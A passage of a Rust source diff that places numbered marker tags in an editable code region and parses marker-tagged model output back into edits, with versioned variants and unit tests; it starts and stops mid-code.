{ + return true; + } + matches!( + trimmed_line.trim_end_matches(';'), + "break" | "continue" | "return" | "throw" | "end" + ) +} + +/// Starting from line `from`, scan up to `MAX_NUDGE_LINES` forward to find a +/// line with `is_good_start`. Returns `None` if no suitable line is found. +fn skip_to_good_start(lines: &[LineInfo], from: usize) -> Option { + (from..lines.len().min(from + MAX_NUDGE_LINES)).find(|&i| lines[i].is_good_start) +} + +/// Compute byte offsets within `editable_text` where marker boundaries should +/// be placed. +/// +/// Returns a sorted `Vec` that always starts with `0` and ends with +/// `editable_text.len()`. Interior offsets are placed at line boundaries +/// (right after a `\n`), preferring blank-line boundaries when available and +/// respecting `min_block_lines` / `max_block_lines` constraints. +fn compute_marker_offsets_with_limits( + editable_text: &str, + min_block_lines: usize, + max_block_lines: usize, +) -> Vec { + if editable_text.is_empty() { + return vec![0, 0]; + } + + let lines = collect_line_info(editable_text); + let mut offsets = vec![0usize]; + let mut last_boundary_line = 0; + let mut i = 0; + + while i < lines.len() { + let gap = i - last_boundary_line; + + // Blank-line split: non-blank line following blank line(s) with enough + // accumulated lines. + if gap >= min_block_lines && !lines[i].is_blank && i > 0 && lines[i - 1].is_blank { + let target = if lines[i].is_good_start { + i + } else { + skip_to_good_start(&lines, i).unwrap_or(i) + }; + if lines.len() - target >= min_block_lines + && lines[target].start > *offsets.last().unwrap_or(&0) + { + offsets.push(lines[target].start); + last_boundary_line = target; + i = target + 1; + continue; + } + } + + // Hard cap: too many lines without a split. + if gap >= max_block_lines { + let target = skip_to_good_start(&lines, i).unwrap_or(i); + if lines[target].start > *offsets.last().unwrap_or(&0) { + offsets.push(lines[target].start); + last_boundary_line = target; + i = target + 1; + continue; + } + } + + i += 1; + } + + let end = editable_text.len(); + if *offsets.last().unwrap_or(&0) != end { + offsets.push(end); + } + + offsets +} + +/// Compute byte offsets within `editable_text` for the V0316/V0317 block sizing rules. +pub fn compute_marker_offsets(editable_text: &str) -> Vec { + compute_marker_offsets_with_limits(editable_text, V0316_MIN_BLOCK_LINES, V0316_MAX_BLOCK_LINES) +} + +pub fn compute_marker_offsets_v0318(editable_text: &str) -> Vec { + compute_marker_offsets_with_limits(editable_text, V0318_MIN_BLOCK_LINES, V0318_MAX_BLOCK_LINES) +} + +/// Write the editable region content with marker tags, inserting the cursor +/// marker at the given offset within the editable text. +pub fn write_editable_with_markers( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + let mut cursor_placed = false; + for (i, &offset) in marker_offsets.iter().enumerate() { + let marker_num = i + 1; + if !output.is_empty() && !output.ends_with('\n') { + output.push('\n'); + } + output.push_str(&marker_tag(marker_num)); + + if let Some(&next_offset) = marker_offsets.get(i + 1) { + output.push('\n'); + let block = &editable_text[offset..next_offset]; + if !cursor_placed + && cursor_offset_in_editable >= offset + && cursor_offset_in_editable <= next_offset + { + cursor_placed = true; + let cursor_in_block = cursor_offset_in_editable - offset; + output.push_str(&block[..cursor_in_block]); + output.push_str(cursor_marker); + output.push_str(&block[cursor_in_block..]); + } else { + output.push_str(block); + } + } + } +} + +/// Strip any `<|marker_N|>` tags from `text`. +/// +/// When a marker tag sits on its own line (followed by `\n`), the trailing +/// newline is also removed so the surrounding lines stay joined naturally. +fn strip_marker_tags(text: &str) -> String { + let mut result = String::with_capacity(text.len()); + let mut pos = 0; + let bytes = text.as_bytes(); + while let Some(rel) = text[pos..].find(MARKER_TAG_PREFIX) { + result.push_str(&text[pos..pos + rel]); + let num_start = pos + rel + MARKER_TAG_PREFIX.len(); + if let Some(suffix_rel) = text[num_start..].find(MARKER_TAG_SUFFIX) { + let mut tag_end = num_start + suffix_rel + MARKER_TAG_SUFFIX.len(); + if bytes.get(tag_end) == Some(&b'\n') { + tag_end += 1; + } + pos = tag_end; + } else { + result.push_str(MARKER_TAG_PREFIX); + pos = num_start; + } + } + result.push_str(&text[pos..]); + result +} + +/// Parse model output that uses the marker format. +/// +/// Returns `(start_marker_num, end_marker_num, content_between_markers)`. +/// The leading format-level newline after the start marker is stripped. +/// Trailing newlines are preserved so blank-line endings in the editable +/// region are not lost. +/// +/// Any extra intermediate marker tags that the model may have inserted +/// between the first and last markers are stripped from the returned content. +pub fn extract_marker_span(text: &str) -> Result<(usize, usize, String)> { + let first_tag_start = text + .find(MARKER_TAG_PREFIX) + .context("no start marker found in output")?; + let first_num_start = first_tag_start + MARKER_TAG_PREFIX.len(); + let first_num_end = text[first_num_start..] + .find(MARKER_TAG_SUFFIX) + .map(|i| i + first_num_start) + .context("malformed start marker tag")?; + let start_num: usize = text[first_num_start..first_num_end] + .parse() + .context("start marker number is not a valid integer")?; + let first_tag_end = first_num_end + MARKER_TAG_SUFFIX.len(); + + let last_tag_start = text + .rfind(MARKER_TAG_PREFIX) + .context("no end marker found in output")?; + let last_num_start = last_tag_start + MARKER_TAG_PREFIX.len(); + let last_num_end = text[last_num_start..] + .find(MARKER_TAG_SUFFIX) + .map(|i| i + last_num_start) + .context("malformed end marker tag")?; + let end_num: usize = text[last_num_start..last_num_end] + .parse() + .context("end marker number is not a valid integer")?; + + if start_num == end_num { + return Err(anyhow!( + "start and end markers are the same (marker {})", + start_num + )); + } + + let mut content_start = first_tag_end; + if text.as_bytes().get(content_start) == Some(&b'\n') { + content_start += 1; + } + let content_end = last_tag_start; + + let content = &text[content_start..content_end.max(content_start)]; + let content = strip_marker_tags(content); + Ok((start_num, end_num, content)) +} + +/// Given old editable text and model output with marker span, reconstruct the +/// full new editable region. +pub fn apply_marker_span(old_editable: &str, output: &str) -> Result { + let (start_num, end_num, raw_new_span) = extract_marker_span(output)?; + let marker_offsets = compute_marker_offsets(old_editable); + + let start_idx = start_num + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = end_num + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + + if start_byte > end_byte { + return Err(anyhow!("start marker must come before end marker")); + } + + let old_span = &old_editable[start_byte..end_byte]; + let mut new_span = raw_new_span; + if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() { + new_span.push('\n'); + } + if !old_span.ends_with('\n') && new_span.ends_with('\n') { + new_span.pop(); + } + + let mut result = String::new(); + result.push_str(&old_editable[..start_byte]); + result.push_str(&new_span); + result.push_str(&old_editable[end_byte..]); + + Ok(result) +} + +/// Compare old and new editable text, find the minimal marker span that covers +/// all changes, and encode the result with marker tags. +pub fn encode_from_old_and_new( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, + no_edits_marker: &str, +) -> Result { + if old_editable == new_editable { + return Ok(format!("{no_edits_marker}{end_marker}")); + } + + let marker_offsets = compute_marker_offsets(old_editable); + let (common_prefix, common_suffix) = + common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes()); + let change_end_in_old = old_editable.len() - common_suffix; + + let start_marker_idx = marker_offsets + .iter() + .rposition(|&offset| offset <= common_prefix) + .unwrap_or(0); + let end_marker_idx = marker_offsets + .iter() + .position(|&offset| offset >= change_end_in_old) + .unwrap_or(marker_offsets.len() - 1); + + let old_start = marker_offsets[start_marker_idx]; + let old_end = marker_offsets[end_marker_idx]; + + let new_start = old_start; + let new_end = new_editable + .len() + .saturating_sub(old_editable.len().saturating_sub(old_end)); + + let new_span = &new_editable[new_start..new_end]; + + let start_marker_num = start_marker_idx + 1; + let end_marker_num = end_marker_idx + 1; + + let mut result = String::new(); + result.push_str(&marker_tag(start_marker_num)); + result.push('\n'); + + if let Some(cursor_offset) = cursor_offset_in_new { + if cursor_offset >= new_start && cursor_offset <= new_end { + let cursor_in_span = cursor_offset - new_start; + let bounded = cursor_in_span.min(new_span.len()); + result.push_str(&new_span[..bounded]); + result.push_str(cursor_marker); + result.push_str(&new_span[bounded..]); + } else { + result.push_str(new_span); + } + } else { + result.push_str(new_span); + } + + if !result.ends_with('\n') { + result.push('\n'); + } + result.push_str(&marker_tag(end_marker_num)); + result.push('\n'); + result.push_str(end_marker); + + Ok(result) +} + +/// Extract the full editable region from text that uses marker tags. +/// +/// Returns the concatenation of all block contents between the first and last +/// markers, with intermediate marker tags stripped. +pub fn extract_editable_region_from_markers(text: &str) -> Option { + let first_marker_start = text.find(MARKER_TAG_PREFIX)?; + + let mut markers: Vec<(usize, usize)> = Vec::new(); + let mut search_start = first_marker_start; + while let Some(rel_pos) = text[search_start..].find(MARKER_TAG_PREFIX) { + let tag_start = search_start + rel_pos; + let num_start = tag_start + MARKER_TAG_PREFIX.len(); + let num_end = text[num_start..].find(MARKER_TAG_SUFFIX)?; + let tag_end = num_start + num_end + MARKER_TAG_SUFFIX.len(); + markers.push((tag_start, tag_end)); + search_start = tag_end; + } + + if markers.len() < 2 { + return None; + } + + let (_, first_tag_end) = markers[0]; + let (last_tag_start, _) = markers[markers.len() - 1]; + + let mut content_start = first_tag_end; + if text.as_bytes().get(content_start) == Some(&b'\n') { + content_start += 1; + } + let mut content_end = last_tag_start; + if content_end > content_start && text.as_bytes().get(content_end - 1) == Some(&b'\n') { + content_end -= 1; + } + + let raw = &text[content_start..content_end]; + let result = strip_marker_tags(raw); + let result = result.strip_suffix('\n').unwrap_or(&result).to_string(); + Some(result) +} + +struct ParsedTag { + value: isize, + tag_start: usize, + tag_end: usize, +} + +fn collect_tags(text: &str, prefix: &str, parse: fn(&str) -> Option) -> Vec { + let mut tags = Vec::new(); + let mut search_from = 0; + while let Some(rel_pos) = text[search_from..].find(prefix) { + let tag_start = search_from + rel_pos; + let payload_start = tag_start + prefix.len(); + if let Some(suffix_rel) = text[payload_start..].find(MARKER_TAG_SUFFIX) { + let payload_end = payload_start + suffix_rel; + if let Some(value) = parse(&text[payload_start..payload_end]) { + let tag_end = payload_end + MARKER_TAG_SUFFIX.len(); + tags.push(ParsedTag { + value, + tag_start, + tag_end, + }); + search_from = tag_end; + continue; + } + } + search_from = tag_start + prefix.len(); + } + tags +} + +fn collect_marker_tags(text: &str) -> Vec { + collect_tags(text, MARKER_TAG_PREFIX, |s| { + s.parse::().ok().map(|n| n as isize) + }) +} + +fn collect_relative_marker_tags(text: &str) -> Vec { + collect_tags(text, RELATIVE_MARKER_TAG_PREFIX, |s| { + s.parse::().ok() + }) +} + +pub fn nearest_marker_number(cursor_offset: Option, marker_offsets: &[usize]) -> usize { + let cursor = cursor_offset.unwrap_or(0); + marker_offsets + .iter() + .enumerate() + .min_by_key(|(_, offset)| (**offset as isize - cursor as isize).unsigned_abs()) + .map(|(idx, _)| idx + 1) + .unwrap_or(1) +} + +fn cursor_block_index(cursor_offset: Option, marker_offsets: &[usize]) -> usize { + let cursor = cursor_offset.unwrap_or(0); + marker_offsets + .windows(2) + .position(|window| cursor >= window[0] && cursor < window[1]) + .unwrap_or_else(|| marker_offsets.len().saturating_sub(2)) +} + +fn common_prefix_suffix(a: &[u8], b: &[u8]) -> (usize, usize) { + let prefix = a.iter().zip(b.iter()).take_while(|(x, y)| x == y).count(); + let remaining_a = a.len() - prefix; + let remaining_b = b.len() - prefix; + let max_suffix = remaining_a.min(remaining_b); + let suffix = a[a.len() - max_suffix..] + .iter() + .rev() + .zip(b[b.len() - max_suffix..].iter().rev()) + .take_while(|(x, y)| x == y) + .count(); + (prefix, suffix) +} + +/// Map a byte offset from old span coordinates to new span coordinates, +/// using common prefix/suffix within the span for accuracy. +fn map_boundary_offset( + old_rel: usize, + old_span_len: usize, + new_span_len: usize, + span_common_prefix: usize, + span_common_suffix: usize, +) -> usize { + if old_rel <= span_common_prefix { + old_rel + } else if old_rel >= old_span_len - span_common_suffix { + new_span_len - (old_span_len - old_rel) + } else { + let old_changed_start = span_common_prefix; + let old_changed_len = old_span_len + .saturating_sub(span_common_prefix) + .saturating_sub(span_common_suffix); + let new_changed_start = span_common_prefix; + let new_changed_len = new_span_len + .saturating_sub(span_common_prefix) + .saturating_sub(span_common_suffix); + + if old_changed_len == 0 { + new_changed_start + } else { + new_changed_start + ((old_rel - old_changed_start) * new_changed_len / old_changed_len) + } + } +} + +fn snap_to_line_start(text: &str, offset: usize) -> usize { + let bounded = offset.min(text.len()); + let bounded = text.floor_char_boundary(bounded); + + if bounded >= text.len() { + return text.len(); + } + + if bounded == 0 || text.as_bytes().get(bounded - 1) == Some(&b'\n') { + return bounded; + } + + if let Some(next_nl_rel) = text[bounded..].find('\n') { + let next = bounded + next_nl_rel + 1; + return text.floor_char_boundary(next.min(text.len())); + } + + let prev_start = text[..bounded].rfind('\n').map(|idx| idx + 1).unwrap_or(0); + text.floor_char_boundary(prev_start) +} + +/// Write the editable region content with byte-exact marker tags, inserting the +/// cursor marker at the given offset within the editable text. +/// +/// The `tag_for_index` closure maps a boundary index to the marker tag string. +fn write_editable_with_markers_impl( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, + marker_offsets: &[usize], + tag_for_index: impl Fn(usize) -> String, +) { + let mut cursor_placed = false; + for (i, &offset) in marker_offsets.iter().enumerate() { + output.push_str(&tag_for_index(i)); + + if let Some(&next_offset) = marker_offsets.get(i + 1) { + let block = &editable_text[offset..next_offset]; + if !cursor_placed + && cursor_offset_in_editable >= offset + && cursor_offset_in_editable <= next_offset + { + cursor_placed = true; + let cursor_in_block = cursor_offset_in_editable - offset; + output.push_str(&block[..cursor_in_block]); + output.push_str(cursor_marker); + output.push_str(&block[cursor_in_block..]); + } else { + output.push_str(block); + } + } + } +} + +pub fn write_editable_with_markers_v0316( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + write_editable_with_markers_impl( + output, + editable_text, + cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag(i + 1), + ); +} + +pub fn write_editable_with_markers_v0317( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets(editable_text); + let anchor_idx = cursor_block_index(Some(cursor_offset_in_editable), &marker_offsets); + write_editable_with_markers_impl( + output, + editable_text, + cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag_relative(i as isize - anchor_idx as isize), + ); +} + +pub fn write_editable_with_markers_v0318( + output: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + cursor_marker: &str, +) { + let marker_offsets = compute_marker_offsets_v0318(editable_text); + write_editable_with_markers_impl( + output, + editable_text, + cursor_offset_in_editable, + cursor_marker, + &marker_offsets, + |i| marker_tag(i + 1), + ); +} + +/// Parse byte-exact model output and reconstruct the full new editable region. +/// +/// `resolve_boundary` maps a parsed tag value to an absolute byte offset in +/// old_editable, given the marker_offsets. Returns `(start_byte, end_byte)` or +/// an error. +fn apply_marker_span_impl( + old_editable: &str, + tags: &[ParsedTag], + output: &str, + resolve_boundaries: impl Fn(isize, isize) -> Result<(usize, usize)>, +) -> Result { + if tags.is_empty() { + return Err(anyhow!("no marker tags found in output")); + } + if tags.len() == 1 { + return Err(anyhow!( + "only one marker tag found in output, expected at least two" + )); + } + + let start_value = tags[0].value; + let end_value = tags[tags.len() - 1].value; + + if start_value == end_value { + return Ok(old_editable.to_string()); + } + + let (start_byte, end_byte) = resolve_boundaries(start_value, end_value)?; + + if start_byte > end_byte { + return Err(anyhow!("start marker must come before end marker")); + } + + let mut new_content = String::new(); + for i in 0..tags.len() - 1 { + let content_start = tags[i].tag_end; + let content_end = tags[i + 1].tag_start; + if content_start <= content_end { + new_content.push_str(&output[content_start..content_end]); + } + } + + let mut result = String::new(); + result.push_str(&old_editable[..start_byte]); + result.push_str(&new_content); + result.push_str(&old_editable[end_byte..]); + + Ok(result) +} + +pub fn apply_marker_span_v0316(old_editable: &str, output: &str) -> Result { + let tags = collect_marker_tags(output); + + // Validate monotonically increasing with no gaps (best-effort warning) + if tags.len() >= 2 { + let start_num = tags[0].value; + let end_num = tags[tags.len() - 1].value; + if start_num != end_num { + let expected: Vec = (start_num..=end_num).collect(); + let actual: Vec = tags.iter().map(|t| t.value).collect(); + if actual != expected { + eprintln!( + "V0316 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.", + expected, actual + ); + } + } + } + + let marker_offsets = compute_marker_offsets(old_editable); + apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| { + let start_idx = (start_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = (end_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +pub fn apply_marker_span_v0317( + old_editable: &str, + output: &str, + cursor_offset_in_old: Option, +) -> Result { + let tags = collect_relative_marker_tags(output); + let marker_offsets = compute_marker_offsets(old_editable); + let anchor_idx = cursor_block_index(cursor_offset_in_old, &marker_offsets); + + apply_marker_span_impl(old_editable, &tags, output, |start_delta, end_delta| { + let start_idx_signed = anchor_idx as isize + start_delta; + let end_idx_signed = anchor_idx as isize + end_delta; + if start_idx_signed < 0 || end_idx_signed < 0 { + return Err(anyhow!("relative marker maps before first marker")); + } + let start_idx = usize::try_from(start_idx_signed).context("invalid start marker index")?; + let end_idx = usize::try_from(end_idx_signed).context("invalid end marker index")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +pub fn apply_marker_span_v0318(old_editable: &str, output: &str) -> Result { + let tags = collect_marker_tags(output); + + if tags.len() >= 2 { + let start_num = tags[0].value; + let end_num = tags[tags.len() - 1].value; + if start_num != end_num { + let expected: Vec = (start_num..=end_num).collect(); + let actual: Vec = tags.iter().map(|t| t.value).collect(); + if actual != expected { + eprintln!( + "V0318 marker sequence validation failed: expected {:?}, got {:?}. Attempting best-effort parse.", + expected, actual + ); + } + } + } + + let marker_offsets = compute_marker_offsets_v0318(old_editable); + apply_marker_span_impl(old_editable, &tags, output, |start_val, end_val| { + let start_idx = (start_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let end_idx = (end_val as usize) + .checked_sub(1) + .context("marker numbers are 1-indexed")?; + let start_byte = *marker_offsets + .get(start_idx) + .context("start marker number out of range")?; + let end_byte = *marker_offsets + .get(end_idx) + .context("end marker number out of range")?; + Ok((start_byte, end_byte)) + }) +} + +/// Encode the training target from old and new editable text. +/// +/// Shared implementation for V0316, V0317, and V0318. The `tag_for_block_idx` +/// closure maps a block index to the appropriate marker tag string. +/// `no_edit_tag` is the marker tag to repeat when there are no edits. +fn encode_from_old_and_new_impl( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, + no_edit_tag: &str, + marker_offsets: &[usize], + tag_for_block_idx: impl Fn(usize) -> String, +) -> Result { + if old_editable == new_editable { + return Ok(format!("{no_edit_tag}{no_edit_tag}{end_marker}")); + } + + let (common_prefix, common_suffix) = + common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes()); + let change_end_in_old = old_editable.len() - common_suffix; + + let mut start_marker_idx = marker_offsets + .iter() + .rposition(|&offset| offset <= common_prefix) + .unwrap_or(0); + let mut end_marker_idx = marker_offsets + .iter() + .position(|&offset| offset >= change_end_in_old) + .unwrap_or(marker_offsets.len() - 1); + + if start_marker_idx == end_marker_idx { + if end_marker_idx < marker_offsets.len().saturating_sub(1) { + end_marker_idx += 1; + } else if start_marker_idx > 0 { + start_marker_idx -= 1; + } + } + + let old_start = marker_offsets[start_marker_idx]; + let old_end = marker_offsets[end_marker_idx]; + + let new_start = old_start; + let new_end = new_editable + .len() + .saturating_sub(old_editable.len().saturating_sub(old_end)); + + let new_span = &new_editable[new_start..new_end]; + let old_span = &old_editable[old_start..old_end]; + + let (span_common_prefix, span_common_suffix) = + common_prefix_suffix(old_span.as_bytes(), new_span.as_bytes()); + + let mut result = String::new(); + let mut prev_new_rel = 0usize; + let mut cursor_placed = false; + + for block_idx in start_marker_idx..end_marker_idx { + result.push_str(&tag_for_block_idx(block_idx)); + + let new_rel_end = if block_idx + 1 == end_marker_idx { + new_span.len() + } else { + let old_rel = marker_offsets[block_idx + 1] - old_start; + let mapped = map_boundary_offset( + old_rel, + old_span.len(), + new_span.len(), + span_common_prefix, + span_common_suffix, + ); + snap_to_line_start(new_span, mapped) + }; + + let new_rel_end = new_rel_end.max(prev_new_rel); + let block_content = &new_span[prev_new_rel..new_rel_end]; + + if !cursor_placed { + if let Some(cursor_offset) = cursor_offset_in_new { + let abs_start = new_start + prev_new_rel; + let abs_end = new_start + new_rel_end; + if cursor_offset >= abs_start && cursor_offset <= abs_end { + cursor_placed = true; + let cursor_in_block = cursor_offset - abs_start; + let bounded = cursor_in_block.min(block_content.len()); + result.push_str(&block_content[..bounded]); + result.push_str(cursor_marker); + result.push_str(&block_content[bounded..]); + prev_new_rel = new_rel_end; + continue; + } + } + } + + result.push_str(block_content); + prev_new_rel = new_rel_end; + } + + result.push_str(&tag_for_block_idx(end_marker_idx)); + result.push_str(end_marker); + + Ok(result) +} + +pub fn encode_from_old_and_new_v0316( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, +) -> Result { + let marker_offsets = compute_marker_offsets(old_editable); + let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets)); + encode_from_old_and_new_impl( + old_editable, + new_editable, + cursor_offset_in_new, + cursor_marker, + end_marker, + &no_edit_tag, + &marker_offsets, + |block_idx| marker_tag(block_idx + 1), + ) +} + +pub fn encode_from_old_and_new_v0317( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, +) -> Result { + let marker_offsets = compute_marker_offsets(old_editable); + let anchor_idx = cursor_block_index(cursor_offset_in_new, &marker_offsets); + let no_edit_tag = marker_tag_relative(0); + encode_from_old_and_new_impl( + old_editable, + new_editable, + cursor_offset_in_new, + cursor_marker, + end_marker, + &no_edit_tag, + &marker_offsets, + |block_idx| marker_tag_relative(block_idx as isize - anchor_idx as isize), + ) +} + +pub fn encode_from_old_and_new_v0318( + old_editable: &str, + new_editable: &str, + cursor_offset_in_new: Option, + cursor_marker: &str, + end_marker: &str, +) -> Result { + let marker_offsets = compute_marker_offsets_v0318(old_editable); + let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets)); + encode_from_old_and_new_impl( + old_editable, + new_editable, + cursor_offset_in_new, + cursor_marker, + end_marker, + &no_edit_tag, + &marker_offsets, + |block_idx| marker_tag(block_idx + 1), + ) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_compute_marker_offsets_small_block() { + let text = "aaa\nbbb\nccc\n"; + let offsets = compute_marker_offsets(text); + assert_eq!(offsets, vec![0, text.len()]); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split() { + let text = "aaa\nbbb\nccc\n\nddd\neee\nfff\n"; + let offsets = compute_marker_offsets(text); + assert_eq!(offsets[0], 0); + assert!(offsets.contains(&13), "offsets: {:?}", offsets); + assert_eq!(*offsets.last().unwrap(), text.len()); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split_overrides_pending_hard_cap_boundary() { + let text = "\ +class OCRDataframe(BaseModel): + model_config = ConfigDict(arbitrary_types_allowed=True) + + df: pl.DataFrame + + def page(self, page_number: int = 0) -> \"OCRDataframe\": + # Filter dataframe on specific page + df_page = self.df.filter(pl.col(\"page\") == page_number) + return OCRDataframe(df=df_page) + + def get_text_cell( + self, + cell: Cell, + margin: int = 0, + page_number: Optional[int] = None, + min_confidence: int = 50, + ) -> Optional[str]: + \"\"\" + Get text corresponding to cell +"; + let offsets = compute_marker_offsets(text); + + let def_start = text + .find(" def get_text_cell(") + .expect("def line exists"); + let self_start = text.find(" self,").expect("self line exists"); + + assert!( + offsets.contains(&def_start), + "expected boundary at def line start ({def_start}), got {offsets:?}" + ); + assert!( + !offsets.contains(&self_start), + "did not expect boundary at self line start ({self_start}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_blank_line_split_skips_closer_line() { + let text = "\ +impl Plugin for AhoySchedulePlugin { + fn build(&self, app: &mut App) { + app.configure_sets( + self.schedule, + ( + AhoySystems::MoveCharacters, + AhoySystems::ApplyForcesToDynamicRigidBodies, + ) + .chain() + .before(PhysicsSystems::First), + ); + + } +} + +/// System set used by all systems of `bevy_ahoy`. +#[derive(SystemSet, Debug, Clone, Copy, Hash, PartialEq, Eq)] +pub enum AhoySystems { + MoveCharacters, + ApplyForcesToDynamicRigidBodies, +} +"; + let offsets = compute_marker_offsets(text); + + let closer_start = text.find(" }\n").expect("closer line exists"); + let doc_start = text + .find("/// System set used by all systems of `bevy_ahoy`.") + .expect("doc line exists"); + + assert!( + !offsets.contains(&closer_start), + "did not expect boundary at closer line start ({closer_start}), got {offsets:?}" + ); + assert!( + offsets.contains(&doc_start), + "expected boundary at doc line start ({doc_start}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_max_lines_split() { + let text = "1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"; + let offsets = compute_marker_offsets(text); + assert!(offsets.len() >= 3, "offsets: {:?}", offsets); + } + + #[test] + fn test_compute_marker_offsets_hard_cap_nudges_past_closer_to_case_line() { + let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\ncase 'x': {\nbody\n"; + let offsets = compute_marker_offsets(text); + + let expected = text.find("case 'x': {").expect("case line exists"); + assert!( + offsets.contains(&expected), + "expected nudged boundary at case line start ({expected}), got {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_hard_cap_nudge_respects_max_forward_lines() { + let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\n}\n}\n}\n}\ncase 'x': {\nbody\n"; + let offsets = compute_marker_offsets(text); + + let case_start = text.find("case 'x': {").expect("case line exists"); + assert!( + !offsets.contains(&case_start), + "boundary should not nudge beyond max forward lines; offsets: {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_stay_sorted_when_hard_cap_boundary_nudges_forward() { + let text = "\ +aaaaaaaaaa = 1; +bbbbbbbbbb = 2; +cccccccccc = 3; +dddddddddd = 4; +eeeeeeeeee = 5; +ffffffffff = 6; +gggggggggg = 7; +hhhhhhhhhh = 8; + }; + }; + + grafanaDashboards = { + cluster-overview.spec = { + inherit instanceSelector; + folderRef = \"infrastructure\"; + json = builtins.readFile ./grafana/dashboards/cluster-overview.json; + }; + }; +"; + let offsets = compute_marker_offsets(text); + + assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}"); + assert_eq!( + offsets.last().copied(), + Some(text.len()), + "offsets: {offsets:?}" + ); + assert!( + offsets.windows(2).all(|window| window[0] <= window[1]), + "offsets must be sorted: {offsets:?}" + ); + } + + #[test] + fn test_compute_marker_offsets_empty() { + let offsets = compute_marker_offsets(""); + assert_eq!(offsets, vec![0, 0]); + } + + #[test] + fn test_compute_marker_offsets_avoid_short_markdown_blocks() { + let text = "\ +# Spree Posts + +This is a Posts extension for [Spree Commerce](https://spreecommerce.org), built with Ruby on Rails. + +## Installation + +1. Add this extension to your Gemfile with this line: + + ```ruby + bundle add spree_posts + ``` + +2. Run the install generator + + ```ruby + bundle exec rails g spree_posts:install + ``` + +3. Restart your server + + If your server was running, restart it so that it can find the assets properly. + +## Developing + +1. Create a dummy app + + ```bash + bundle update + bundle exec rake test_app + ``` + +2. Add your new code +3. Run tests + + ```bash + bundle exec rspec + ``` + +When testing your applications integration with this extension you may use it's factories. +Simply add this require statement to your spec_helper: + +```ruby +require 'spree_posts/factories' +``` + +## Releasing a new version + +```shell +bundle exec gem bump -p -t +bundle exec gem release +``` + +For more options please see [gem-release README](https://github.com/svenfuchs/gem-release) + +## Contributing + +If you'd like to contribute, please take a look at the contributing guide. +"; + let offsets = compute_marker_offsets(text); + + assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}"); + assert_eq!( + offsets.last().copied(), + Some(text.len()), + "offsets: {offsets:?}" + ); + + for window in offsets.windows(2) { + let block = &text[window[0]..window[1]]; + let line_count = block.lines().count(); + assert!( + line_count >= V0316_MIN_BLOCK_LINES, + "block too short: {line_count} lines in block {block:?} with offsets {offsets:?}" + ); + } + } + + #[test] + fn test_extract_marker_span() { + let text = "<|marker_2|>\n new content\n<|marker_3|>\n"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 2); + assert_eq!(end, 3); + assert_eq!(content, " new content\n"); + } + + #[test] + fn test_extract_marker_span_multi_line() { + let text = "<|marker_1|>\nline1\nline2\nline3\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 1); + assert_eq!(end, 4); + assert_eq!(content, "line1\nline2\nline3\n"); + } + + #[test] + fn test_apply_marker_span_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>\naaa\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_preserves_trailing_blank_line() { + let old = "/\nresult\n\n"; + let output = "<|marker_1|>\n//\nresult\n\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "//\nresult\n\n"); + } + + #[test] + fn test_encode_no_edits() { + let old = "aaa\nbbb\nccc\n"; + let result = encode_from_old_and_new( + old, + old, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + 